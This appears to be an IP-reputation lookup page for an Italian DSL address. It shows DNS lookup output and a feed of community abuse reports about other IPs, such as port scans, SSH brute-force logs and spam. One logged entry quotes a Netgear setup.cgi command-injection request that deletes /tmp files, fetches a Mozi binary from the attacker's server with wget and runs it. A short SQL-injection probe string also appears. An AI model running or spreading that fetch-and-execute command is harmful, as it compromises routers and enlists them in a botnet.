Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Italy

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 93.148.42.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 52547
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;93.148.42.8.			IN	A

;; AUTHORITY SECTION:
.			534	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2021122900 1800 900 604800 86400

;; Query time: 67 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Dec 29 17:58:51 CST 2021
;; MSG SIZE  rcvd: 104
Host info
8.42.148.93.in-addr.arpa domain name pointer net-93-148-42-8.cust.vodafonedsl.it.
8.42.148.93.in-addr.arpa domain name pointer net-93-148-42-8.cust.dsl.teletu.it.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
8.42.148.93.in-addr.arpa	name = net-93-148-42-8.cust.vodafonedsl.it.
8.42.148.93.in-addr.arpa	name = net-93-148-42-8.cust.dsl.teletu.it.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
106.208.249.241 attackspam
Automatic report - Port Scan
2020-10-05 19:20:03
54.38.123.225 attackbotsspam
0,16-03/34 [bc01/m178] PostRequest-Spammer scoring: lisboa
2020-10-05 19:02:05
183.224.38.56 attackbots
Port scan: Attack repeated for 24 hours
2020-10-05 19:13:54
193.95.81.121 attack
Oct  5 07:44:25 firewall sshd[6060]: Failed password for root from 193.95.81.121 port 35576 ssh2
Oct  5 07:46:33 firewall sshd[6121]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.95.81.121  user=root
Oct  5 07:46:36 firewall sshd[6121]: Failed password for root from 193.95.81.121 port 46394 ssh2
...
2020-10-05 18:59:10
219.157.205.115 attack
Probing for open proxy via GET parameter of web address and/or web log spamming.

219.157.205.115 - - [04/Oct/2020:20:34:35 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://219.157.205.115:53064/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 403 153 "-" "-"
2020-10-05 18:50:31
198.143.133.158 attackbots
TCP port : 902
2020-10-05 19:03:53
45.152.181.164 attackbots
Automatic report generated by Wazuh
2020-10-05 19:04:45
185.73.230.140 attack
Usual financial SPAM from eTOP Sp. z o.o.'s 185.73.228.0/22. Numerous contacts with their abuse dept. with no result; From/MailFrom finprom.com.pl, Subject: 150 000 =?UTF-8?Q?z=C5=82._kredytu_bankowego_dla_firm,_kt=C3=B3rym_spad=C5=82y?=
	przychody.
2020-10-05 18:57:42
62.173.147.70 attackspambots
emailspam / phishing
2020-10-05 19:19:17
110.78.138.66 attack
"Test Inject  em'a=0"
2020-10-05 19:07:41
159.203.110.73 attackbotsspam
Oct  5 11:05:50 ip-172-31-42-142 sshd\[7590\]: Failed password for root from 159.203.110.73 port 53504 ssh2\
Oct  5 11:05:55 ip-172-31-42-142 sshd\[7592\]: Failed password for root from 159.203.110.73 port 58708 ssh2\
Oct  5 11:05:58 ip-172-31-42-142 sshd\[7594\]: Failed password for root from 159.203.110.73 port 35714 ssh2\
Oct  5 11:06:00 ip-172-31-42-142 sshd\[7596\]: Invalid user admin from 159.203.110.73\
Oct  5 11:06:02 ip-172-31-42-142 sshd\[7596\]: Failed password for invalid user admin from 159.203.110.73 port 40966 ssh2\
2020-10-05 19:07:12
75.55.248.20 attack
[N3.H3.VM3] Port Scanner Detected Blocked by UFW
2020-10-05 19:14:19
134.175.89.31 attackspambots
Brute%20Force%20SSH
2020-10-05 18:54:31
201.242.225.130 attackspambots
Listed on    zen-spamhaus also abuseat.org   / proto=6  .  srcport=58354  .  dstport=445 SMB  .     (3489)
2020-10-05 19:26:15
193.169.252.206 attackspam
2020-10-05T04:22:26.118905linuxbox-skyline auth[284145]: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=deposit rhost=193.169.252.206
...
2020-10-05 18:57:06

Recently Reported IPs

207.67.58.130 100.141.122.181 237.249.187.63 81.189.94.20
204.38.28.229 214.48.149.252 152.103.231.54 159.236.169.236
129.158.68.158 239.17.125.94 180.31.100.99 243.169.184.240
243.106.122.175 37.86.170.150 94.109.113.93 102.81.70.123
154.249.127.27 39.115.175.99 121.90.221.193 179.12.87.14